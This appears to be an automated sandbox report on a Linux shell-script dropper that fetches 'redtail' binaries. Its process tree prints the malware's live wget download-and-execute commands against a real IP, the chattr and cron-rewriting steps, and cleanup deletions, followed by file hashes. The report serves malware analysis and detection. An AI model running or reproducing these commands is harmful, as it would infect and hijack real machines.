Analysis

  • max time kernel
    40s
  • max time network
    18s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    01-02-2025 03:09

General

  • Target

    3a9ae9bd26448244f01988d954e60d3492da84ae1b6237965cf35b9ebf3912cd.sh

  • Size

    1KB

  • MD5

    a85657b9ccd1984a6757a87845a61a0d

  • SHA1

    1dc82b5d65d775348c4addefa3e2ff470d19bc3e

  • SHA256

    3a9ae9bd26448244f01988d954e60d3492da84ae1b6237965cf35b9ebf3912cd

  • SHA512

    1b79940f7fc522e6797060023cf713d16e44ff15bf98b41ecb0baf9da3cadb17eaf168abc4cbd3e0dd6d0eecd3b936651f1f8d9b4f19c78bda26b8d94dd31aab

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 5 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 4 IoCs
  • Attempts to change immutable files 22 IoCs

    Modifies inode attributes on the filesystem to allow changing of immutable files.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates kernel/hardware configuration 1 TTPs 2 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 19 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/3a9ae9bd26448244f01988d954e60d3492da84ae1b6237965cf35b9ebf3912cd.sh
    /tmp/3a9ae9bd26448244f01988d954e60d3492da84ae1b6237965cf35b9ebf3912cd.sh
    1⤵
    • Executes dropped EXE
    PID:704
    • /bin/grep
      grep noexec
      2⤵
        PID:709
      • /usr/bin/awk
        awk "{print \$2}"
        2⤵
        • Reads runtime system information
        PID:711
      • /bin/cat
        cat /proc/mounts
        2⤵
        • Reads runtime system information
        PID:708
      • /usr/bin/whoami
        whoami
        2⤵
          PID:721
        • /usr/bin/find
          find / -type d -user root -perm "-u=rwx" -not -path "/tmp/*" -not -path "/proc/*" -not -path /sys -not -path "/sys/*" -not -path /proc -not -path "/proc/*" -not -path /dev/pts -not -path "/dev/pts/*" -not -path /run -not -path "/run/*" -not -path /sys/kernel/security -not -path "/sys/kernel/security/*" -not -path /run/lock -not -path "/run/lock/*" -not -path /sys/fs/cgroup -not -path "/sys/fs/cgroup/*" -not -path /sys/fs/cgroup/systemd -not -path "/sys/fs/cgroup/systemd/*" -not -path "/sys/fs/cgroup/net_cls,net_prio" -not -path "/sys/fs/cgroup/net_cls,net_prio/*" -not -path /sys/fs/cgroup/memory -not -path "/sys/fs/cgroup/memory/*" -not -path /sys/fs/cgroup/freezer -not -path "/sys/fs/cgroup/freezer/*" -not -path "/sys/fs/cgroup/cpu,cpuacct" -not -path "/sys/fs/cgroup/cpu,cpuacct/*" -not -path /sys/fs/cgroup/perf_event -not -path "/sys/fs/cgroup/perf_event/*" -not -path /sys/fs/cgroup/pids -not -path "/sys/fs/cgroup/pids/*" -not -path /sys/fs/cgroup/devices -not -path "/sys/fs/cgroup/devices/*" -not -path /sys/fs/cgroup/blkio -not -path "/sys/fs/cgroup/blkio/*" -not -path /sys/fs/cgroup/cpuset -not -path "/sys/fs/cgroup/cpuset/*"
          2⤵
          • Reads runtime system information
          PID:724
        • /bin/uname
          uname -mp
          2⤵
            PID:745
          • /usr/bin/touch
            touch .testfile
            2⤵
              PID:747
            • /bin/dd
              dd "if=/dev/zero" "of=.testfile2" "bs=2M" "count=1"
              2⤵
                PID:750
              • /bin/rm
                rm -rf .testfile .testfile2
                2⤵
                  PID:751
                • /usr/bin/wget
                  wget http://195.177.95.149/clean
                  2⤵
                    PID:753
                  • /bin/chmod
                    chmod +x clean
                    2⤵
                    • File and Directory Permissions Modification
                    PID:759
                  • /bin/sh
                    sh clean
                    2⤵
                    • Writes file to tmp directory
                    PID:760
                    • /bin/systemctl
                      systemctl disable c3pool_miner
                      3⤵
                      • Enumerates kernel/hardware configuration
                      • Reads runtime system information
                      PID:761
                    • /bin/systemctl
                      systemctl stop c3pool_miner
                      3⤵
                      • Enumerates kernel/hardware configuration
                      • Reads runtime system information
                      PID:764
                    • /usr/bin/chattr
                      chattr -ia /var/spool/cron/crontabs
                      3⤵
                      • Attempts to change immutable files
                      PID:765
                    • /usr/bin/chattr
                      chattr -ia /etc/crontab
                      3⤵
                      • Attempts to change immutable files
                      PID:767
                    • /bin/grep
                      grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/crontab
                      3⤵
                      • Attempts to change immutable files
                      PID:768
                    • /bin/mv
                      mv /tmp/clean_crontab /etc/crontab
                      3⤵
                      • Reads runtime system information
                      PID:770
                    • /usr/bin/chattr
                      chattr -ia /etc/cron.hourly
                      3⤵
                      • Attempts to change immutable files
                      PID:771
                    • /usr/bin/chattr
                      chattr -ia /etc/cron.daily
                      3⤵
                      • Attempts to change immutable files
                      PID:773
                    • /usr/bin/chattr
                      chattr -ia /etc/cron.daily/apt-compat
                      3⤵
                      • Attempts to change immutable files
                      PID:774
                    • /bin/grep
                      grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/apt-compat
                      3⤵
                      • Attempts to change immutable files
                      PID:776
                    • /bin/mv
                      mv /tmp/clean_crontab /etc/cron.daily/apt-compat
                      3⤵
                      • Reads runtime system information
                      PID:777
                    • /usr/bin/chattr
                      chattr -ia /etc/cron.daily/bsdmainutils
                      3⤵
                      • Attempts to change immutable files
                      PID:778
                    • /bin/grep
                      grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/bsdmainutils
                      3⤵
                      • Attempts to change immutable files
                      PID:780
                    • /bin/mv
                      mv /tmp/clean_crontab /etc/cron.daily/bsdmainutils
                      3⤵
                      • Reads runtime system information
                      PID:782
                    • /usr/bin/chattr
                      chattr -ia /etc/cron.daily/dpkg
                      3⤵
                      • Attempts to change immutable files
                      PID:783
                    • /bin/grep
                      grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/dpkg
                      3⤵
                      • Attempts to change immutable files
                      PID:784
                    • /bin/mv
                      mv /tmp/clean_crontab /etc/cron.daily/dpkg
                      3⤵
                      • Reads runtime system information
                      PID:786
                    • /usr/bin/chattr
                      chattr -ia /etc/cron.daily/exim4-base
                      3⤵
                      • Attempts to change immutable files
                      PID:788
                    • /bin/grep
                      grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/exim4-base
                      3⤵
                      • Attempts to change immutable files
                      PID:789
                    • /bin/mv
                      mv /tmp/clean_crontab /etc/cron.daily/exim4-base
                      3⤵
                      • Reads runtime system information
                      PID:790
                    • /usr/bin/chattr
                      chattr -ia /etc/cron.daily/logrotate
                      3⤵
                      • Attempts to change immutable files
                      PID:792
                    • /bin/grep
                      grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/logrotate
                      3⤵
                      • Attempts to change immutable files
                      PID:793
                    • /bin/mv
                      mv /tmp/clean_crontab /etc/cron.daily/logrotate
                      3⤵
                      • Reads runtime system information
                      PID:795
                    • /usr/bin/chattr
                      chattr -ia /etc/cron.daily/passwd
                      3⤵
                      • Attempts to change immutable files
                      PID:796
                    • /bin/grep
                      grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/passwd
                      3⤵
                      • Attempts to change immutable files
                      PID:798
                    • /bin/mv
                      mv /tmp/clean_crontab /etc/cron.daily/passwd
                      3⤵
                      • Reads runtime system information
                      PID:800
                    • /usr/bin/chattr
                      chattr -ia /etc/cron.weekly
                      3⤵
                      • Attempts to change immutable files
                      PID:801
                    • /usr/bin/chattr
                      chattr -ia /etc/cron.monthly
                      3⤵
                      • Attempts to change immutable files
                      PID:802
                    • /usr/bin/chattr
                      chattr -ia /etc/cron.d
                      3⤵
                      • Attempts to change immutable files
                      PID:803
                    • /usr/bin/chattr
                      chattr -ia /etc/anacrontab
                      3⤵
                      • Attempts to change immutable files
                      PID:805
                    • /bin/grep
                      grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/anacrontab
                      3⤵
                      • Attempts to change immutable files
                      PID:807
                    • /bin/mv
                      mv /tmp/clean_crontab /etc/anacrontab
                      3⤵
                      • Reads runtime system information
                      PID:808
                    • /bin/rm
                      rm -rf /tmp/3a9ae9bd26448244f01988d954e60d3492da84ae1b6237965cf35b9ebf3912cd.sh /tmp/systemd-private-e748058ea2794903a7c0f0558291be4c-systemd-timedated.service-xMD1Ku
                      3⤵
                        PID:809
                      • /bin/rm
                        rm -rf /var/tmp/systemd-private-e748058ea2794903a7c0f0558291be4c-systemd-timedated.service-aojdTL
                        3⤵
                          PID:811
                        • /bin/rm
                          rm -rf "/dev/shm/*"
                          3⤵
                            PID:813
                        • /bin/rm
                          rm -rf clean
                          2⤵
                            PID:814
                          • /bin/rm
                            rm -rf .redtail
                            2⤵
                              PID:815
                            • /bin/grep
                              grep -q x86_64
                              2⤵
                                PID:817
                              • /bin/grep
                                grep -q amd64
                                2⤵
                                  PID:820
                                • /bin/grep
                                  grep -q "i[3456]86"
                                  2⤵
                                    PID:825
                                  • /bin/grep
                                    grep -q armv8
                                    2⤵
                                      PID:827
                                    • /bin/grep
                                      grep -q aarch64
                                      2⤵
                                        PID:829
                                      • /bin/grep
                                        grep -q armv7
                                        2⤵
                                          PID:832
                                        • /usr/bin/wget
                                          wget http://195.177.95.149/x86_64
                                          2⤵
                                            PID:835
                                          • /bin/cat
                                            cat x86_64
                                            2⤵
                                              PID:846
                                            • /bin/chmod
                                              chmod +x .redtail
                                              2⤵
                                              • File and Directory Permissions Modification
                                              PID:847
                                            • /.redtail
                                              ./.redtail
                                              2⤵
                                                PID:848
                                              • /bin/rm
                                                rm -rf x86_64
                                                2⤵
                                                  PID:850
                                                • /usr/bin/wget
                                                  wget http://195.177.95.149/i686
                                                  2⤵
                                                    PID:851
                                                  • /bin/cat
                                                    cat i686
                                                    2⤵
                                                      PID:855
                                                    • /bin/chmod
                                                      chmod +x .redtail
                                                      2⤵
                                                      • File and Directory Permissions Modification
                                                      PID:856
                                                    • /.redtail
                                                      ./.redtail
                                                      2⤵
                                                        PID:857
                                                      • /bin/rm
                                                        rm -rf i686
                                                        2⤵
                                                          PID:859
                                                        • /usr/bin/wget
                                                          wget http://195.177.95.149/aarch64
                                                          2⤵
                                                            PID:860
                                                          • /bin/cat
                                                            cat aarch64
                                                            2⤵
                                                              PID:891
                                                            • /bin/chmod
                                                              chmod +x .redtail
                                                              2⤵
                                                              • File and Directory Permissions Modification
                                                              PID:892
                                                            • /.redtail
                                                              ./.redtail
                                                              2⤵
                                                                PID:893
                                                              • /bin/rm
                                                                rm -rf aarch64
                                                                2⤵
                                                                  PID:895
                                                                • /usr/bin/wget
                                                                  wget http://195.177.95.149/arm7
                                                                  2⤵
                                                                    PID:896
                                                                  • /bin/cat
                                                                    cat arm7
                                                                    2⤵
                                                                      PID:897
                                                                    • /bin/chmod
                                                                      chmod +x .redtail
                                                                      2⤵
                                                                      • File and Directory Permissions Modification
                                                                      PID:898
                                                                    • /.redtail
                                                                      ./.redtail
                                                                      2⤵
                                                                        PID:899
                                                                      • /bin/rm
                                                                        rm -rf arm7
                                                                        2⤵
                                                                          PID:901

                                                                      Network

                                                                      MITRE ATT&CK Enterprise v15

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

                                                                      • /.testfile2

                                                                        Filesize

                                                                        2.0MB

                                                                        MD5

                                                                        b2d1236c286a3c0704224fe4105eca49

                                                                        SHA1

                                                                        7d76d48d64d7ac5411d714a4bb83f37e3e5b8df6

                                                                        SHA256

                                                                        5647f05ec18958947d32874eeb788fa396a05d0bab7c1b71f112ceb7e9b31eee

                                                                        SHA512

                                                                        731859029215873fdac1c9f2f8bd25a334abf0f3a9e1b057cf2cacc2826d86b0c26a3fa920a936421401c0471f38857cb53ba905489ea46b185209fdff65b3b6

                                                                      • /aarch64

                                                                        Filesize

                                                                        1.3MB

                                                                        MD5

                                                                        322095f828345179dc422bcf65db4b61

                                                                        SHA1

                                                                        c244dce124772e0d94a01b3bc0d5d005614101b2

                                                                        SHA256

                                                                        992cb5a753697ee2642aa390f09326fcdb7fd59119053d6b1bdd35d47e62f472

                                                                        SHA512

                                                                        c8da61b2ee95cae3eb62d4985be6eeee41976fa0a69e0c738353e7e179454e8872d52152ca6df54949a6c6dd42f48b0981593c1f4f973e9e1e176ba4ca978f70

                                                                      • /arm7

                                                                        Filesize

                                                                        1.1MB

                                                                        MD5

                                                                        045daa66263bfd467051c013e9222faf

                                                                        SHA1

                                                                        4b943b14526d7bf7be2b3e3f9af24d1f35015548

                                                                        SHA256

                                                                        d4635f0f5ab84af5e5194453dbf60eaebf6ec47d3675cb5044e5746fb48bd4b4

                                                                        SHA512

                                                                        bd684e0909793c05a34891f2ffe289e00b66c634d8059a9301274ef764aff38ae6d5c0c224228d11007b297e32e00749b40197f77f7fc48c44c50ef3651bc41f

                                                                      • /clean

                                                                        Filesize

                                                                        795B

                                                                        MD5

                                                                        397ff5e54194072e6d8a44a0d8cc1b27

                                                                        SHA1

                                                                        42477b0c3b277b5e907b0a35c644f3291ed30a63

                                                                        SHA256

                                                                        d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e

                                                                        SHA512

                                                                        ff40c129e3b2891ae280bce97e52ee69aea18ca60ea7901f7efd4cf11d3bf1c4ee48e9eb90e5f045e080ab784ee2a9942c2bcf0a531b7f4602931f63c4b32d74

                                                                      • /i686

                                                                        Filesize

                                                                        1.5MB

                                                                        MD5

                                                                        01fc359f540fca7f496b5c4841c67f7e

                                                                        SHA1

                                                                        4689b4afff6f08b8c9e781d07c3a782823a6689f

                                                                        SHA256

                                                                        69dc9dd8065692ea262850b617c621e6c1361e9095a90b653b26e3901597f586

                                                                        SHA512

                                                                        4d7170159ec6a651cd7b8e64ab06aa76f3bb691be70d219a7dbc1116a383f43226ec6815ae51fe23b25c9450f142cba0ba71ce659dae9ca376e97f126e81a4fc

                                                                      • /tmp/clean_crontab

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        30e858769aacd9cc309502f8d5c6aa0f

                                                                        SHA1

                                                                        927c06dd4d6cbb5ca02e9505011c8667c47f2d6e

                                                                        SHA256

                                                                        eff406c0943e1399e3e15fdb6ca2893a187d6b273f5bd9d17eec4e4b4c52b8cd

                                                                        SHA512

                                                                        f7f6e70925afe54fc2fdaae13a750b3c49fde9fa59d80af321885d270112ebb2291f034037708f1ba8515f3e3e1ca0a493cd1e002895aa699c469e0365ccde3c

                                                                      • /tmp/clean_crontab

                                                                        Filesize

                                                                        3KB

                                                                        MD5

                                                                        02f33c9e59b27bcd241e488cd48de072

                                                                        SHA1

                                                                        9247eee9b2310d56455beccf41c577ba16b78e3d

                                                                        SHA256

                                                                        2565ab0cb86a8cb7fd37a0401ad22624da886b8df9130a5bd4b566f404130c14

                                                                        SHA512

                                                                        1eda274264320a72cd58462b6c8a7747990a7eedf836be730b51b92ea6b04a1005aed596f9b9d53c4c8a93001d112450d0c6d83dfe4eee4b91a671623662fb3d

                                                                      • /tmp/clean_crontab

                                                                        Filesize

                                                                        249B

                                                                        MD5

                                                                        db990990933b6f56322725223f13c2bc

                                                                        SHA1

                                                                        387303696a796e27f559c73679e979f2a538072d

                                                                        SHA256

                                                                        777a9112ee093d8683645b031eb6cfeb9ce77274f40575c48ff2054ea24114d1

                                                                        SHA512

                                                                        a3764e580bcfe0b2100da8ff2a00bed4936cb2acc9985daef52fb0310a7ed3367a1944a355c3f1dbc92d82c82b54280926736f81bc138efb4f7df1814abee3b5

                                                                      • /tmp/clean_crontab

                                                                        Filesize

                                                                        722B

                                                                        MD5

                                                                        8f111d100ea459f68d333d63a8ef2205

                                                                        SHA1

                                                                        077ca9c46a964de67c0f7765745d5c6f9e2065c3

                                                                        SHA256

                                                                        0e5c204385b21e15b031c83f37212bf5a4ee77b51762b7b54bd6ad973ebdf354

                                                                        SHA512

                                                                        d81767b47fb84aaf435f930356ded574ee9825ec710a2e7c26074860d8a385741d65572740137b6f9686c285a32e2951ca933393b266746988f1737aad059adb

                                                                      • /tmp/clean_crontab

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        bc4a71cbcaeed4179f25d798257fa980

                                                                        SHA1

                                                                        61445721d0b5d86ac0a8386a4ceef450118f4fbb

                                                                        SHA256

                                                                        8eeae3a9df22621d51062e4dadfc5c63b49732b38a37b5d4e52c99c2237e5767

                                                                        SHA512

                                                                        709badb4dd1a15a10b34f82d31ed4bbab81698190d2ec94e2ad3dcdc90d97b893eb61cde72f08e517a8beea08ec1d675385fd42a9e77530981b7d83c6bd3548c

                                                                      • /tmp/clean_crontab

                                                                        Filesize

                                                                        279B

                                                                        MD5

                                                                        911a774fe040993b929504f3d9415ab3

                                                                        SHA1

                                                                        55ccc8e95097f005abf9f4d91a14394e6d0f5da5

                                                                        SHA256

                                                                        340dfc483eb79b83b0630b1c0b339e30ebd724ef2f58bb87ba92946472e8e63d

                                                                        SHA512

                                                                        1eb8fd8dc6fd444ba2fa3ca7e863894cfb19383e5b20c700ed24aa615402340424d093a761632cf27a3e789ecd548ca972806e154161635da4f97b415d6fc64f

                                                                      • /x86_64

                                                                        Filesize

                                                                        1.6MB

                                                                        MD5

                                                                        f6634e2fb7872be767a2cb5b1da04103

                                                                        SHA1

                                                                        532037729f2da9fc1341f744e5afa2420bcfebca

                                                                        SHA256

                                                                        29f8524562c2436f42019e0fc473bd88584234c57979c7375c1ace3648784e4b

                                                                        SHA512

                                                                        e1b34b5235ecfe8f74698d10ecf70758adcb5ef2832b3be272fe737770f47daf4974fe6c957ccf24282a1a0af4a4cca393727517ea5ade97504a55b3b6a6ff51